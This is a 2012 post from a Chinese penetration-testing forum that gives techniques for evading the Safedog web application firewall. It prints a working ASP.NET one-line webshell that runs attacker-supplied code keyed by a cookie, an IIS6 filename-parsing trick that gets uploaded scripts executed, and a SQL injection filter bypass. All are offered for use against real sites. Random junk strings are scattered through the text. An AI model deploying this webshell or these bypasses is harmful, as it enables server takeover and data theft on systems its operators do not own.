中国网络渗透测试联盟

标题: 突破安全狗防注入及上传的一些思路 [打印本页]
作者: admin    时间: 2012-10-31 08:25
标题: 突破安全狗防注入及上传的一些思路
1、绕过IIS安全狗的一句话。& h& r, B. P% ]7 n% ^
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。4 s. C, [6 R: k$ ^1 y9 v+ O' P
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
2 T1 d4 c, V# R2 ?9 z) ]" _
' V2 [0 H7 A" h& u! T2、IIS6.0解析漏洞遇到安全狗。8 A* v1 X/ B5 C) T8 P1 c1 M+ b! s- j- }
文件名为8 y+ _7 F7 }2 ?8 K6 }
http://www.xxxxx.com/sh3llc0de.asp;1.jpg/ m4 f; b! M( c, c6 S

+ e6 C' }7 M% M5 e1 R, n这样的会被IIS安全狗果断屏蔽。
9 ~9 z+ X" B/ o0 F' \改成如下名称,IIS6一样会解析:
& B  N0 h1 B: E" B" ~www.xxxxx.com/;1.asp;1.jpg( h( v6 t1 U! Y1 }8 r/ m" F* [
1 _, q: g( j0 t! U- [2 g
3、安全狗的注入绕过。2 G5 C! T" g( {$ `
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
0 z4 Y* c" f; F$ K4 P但如果:
- |4 A# V3 g- Y/ f9 V* ]: ir00ts.asp?r00ts.com=%00.&id=69%20 and 1=1& I+ o) h6 j# e1 ]4 ]! s' L, U$ ?# O
就可以成功绕过了。$ s/ `; R( n3 O" ^; N

; f9 z+ q5 ~, N" ^  b' m* {5 y6 y* r( y4 u4 \* u; z




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2